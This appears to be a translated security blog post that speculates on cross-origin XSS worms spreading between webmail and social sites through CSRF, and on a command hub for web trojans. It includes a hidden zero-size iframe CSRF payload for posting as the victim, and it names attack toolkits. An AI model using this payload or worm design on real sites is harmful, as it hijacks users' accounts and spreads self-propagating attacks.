Cross-origin worms

Source: Internet
Author: User
From: 0x37 Security

Recently I analyzed the XSS and CSRF vulnerabilities of several major websites and began thinking about cross-origin worms. While modifying the ghost page in qz, I found a cross-origin bug in IE6; the impact of that bug is not as simple as cookie theft :). The cross-origin worm discussed below, however, has nothing to do with that bug, and this article is pure speculation.

The rise of the XSS worm is inseparable from SNS networks, and its technical core is not the XMLHttpRequest object. I have written several SNS worms; if such worms could communicate with each other (getting around the restriction that they cannot cross origins), the damage would be greater, and more interesting :). First we need to clarify the conditions a worm needs to survive in the Web x.0 world and how it breeds (omitted). There are many methods by which worms can communicate.

I. Mail-to-mail worm:

Mail services can send mail to each other, and a mail worm can use this to spread its payload (an XSS trap) to a different email service. The payloads will of course differ: a Sohu Mail XSS worm and a QQ Mail XSS worm can use this communication channel to send mail to one another, and the DOM logic of the worm in these two mail environments is certainly not the same, but basic functional modules can be shared, such as the XMLHttpRequest wrapper and some basic user-defined functions. Such a cross-domain worm must be able to determine which environment it is running in, which is very simple.

This is the simplest cross-origin worm model.

II. CSRF worm:

Cross-origin worms of this type borrow a CSRF vulnerability. For example, suppose I have an XSS worm running on myspace.cn, and yeeyan.com has a very low-level CSRF vulnerability. How can I carry the MySpace threat over to Yeeyan? In this case, add the following code to the XSS worm on myspace.cn:

<iframe src="http://www.0x37.com/Project/csrf/do.asp?csrf=Hangzhou)&ymsggroup=&ymsgee=19076&ymsgee_username=19076" width="0" height="0"></iframe>

A single simple request like this is all it takes, because the victim's browser attaches its yeeyan.com cookies to the hidden iframe's request.

Suppose myspace.cn and yeeyan.com have some cooperative relationship: users often need the services of both and are logged in to both SNS networks. Then, when user A on MySpace is infected by the XSS worm, the worm sends a CSRF request as user B on Yeeyan (A and B are the same person in the real world), and user B automatically publishes a message on Yeeyan. What if that message is an XSS trap? Or a CSRF-spoofing message for yeeyan.com? Haha, this is the art of how worms breed :).

III. Web-trojan (网马) hub:

This concept has been mentioned before. Such a hub should not be restricted to web-trojan technology. Independent Web 2.0 worms need a control center so that worms with no relation to each other can still communicate, and the web-trojan hub is the intermediary for that communication :). The hub should also provide real-time control over web trojans and web worms. This is still incomplete, and far from perfect; as I said, building such a hub means combining complex server-side technology. This is the direction things are heading.

IV. Other communication methods:

There are many more; I will not keep speculating......

As I said: the web-trojan hub is king. Tools such as the MPack toolkit, BeEF and XSS Shell are quite good. As for cross-origin...... maybe it does not need to be this complicated at all.
